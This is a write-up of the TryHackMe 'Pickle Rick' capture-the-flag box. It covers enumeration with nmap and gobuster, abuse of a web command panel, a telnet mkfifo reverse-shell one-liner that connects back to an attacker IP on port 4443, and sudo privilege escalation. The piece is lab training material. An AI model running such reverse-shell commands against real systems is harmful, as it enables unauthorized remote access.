TryHackMe: Pickle Rick CTF

Type: CTF Writeup Platform: TryHackMe Difficulty: Easy

CTF Web Linux Enumeration Reverse Shell

A fun machine that focuses on enumeration and investigation, reverse shells, and the Linux file system.

Enumeration

After starting the machine, I ran a few different processes to gain a basic understanding of the machine and services.

dirb:
    /assets/

nmap:
    port 22: OpenSSH
    port 80: Apache on Ubuntu
        Apache/2.4.18 (Ubuntu) Server at 10.10.139.155 Port 80

Note to self, remember username!

Username: R1ckRul3s

The text references "BURP" twice - possibly a hint that Burp Suite will be useful.

Running gobuster with file extensions revealed a login page:

gobuster -u http://ip/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html -t 15

/login.php

Authentication was successful using the username and string from robots.txt!

The login granted access to a command execution box. First commands:

id
ls -lah

We have a webshell with www-data user (uid 33). Interesting files discovered:

The cat command was disabled, but strings worked:

strings clue.txt
# "Look around the file system for the other ingredient."

strings Sup3rS3cretPickl3Ingred.txt
# First flag obtained!

To make further progress, a more useful reverse shell was needed. After trying various methods, telnet worked:

TF=$(mktemp -u);mkfifo $TF && telnet 10.13.5.104 4443 0<$TF | /bin/bash 1>$TF

Navigating to /home found the second ingredient:

cd /home
cd rick
ls  # second ingredients
cat *  # Second flag obtained!

Running preliminary privesc commands:

find . -perm /4000
sudo -l

Interestingly, sudo -l returned "ALL" - this user can run any command as root!

sudo ls /root/  # Shows 3rd.txt
sudo vi /root/3rd.txt  # Third flag obtained!

The machine was complete with all three ingredients found.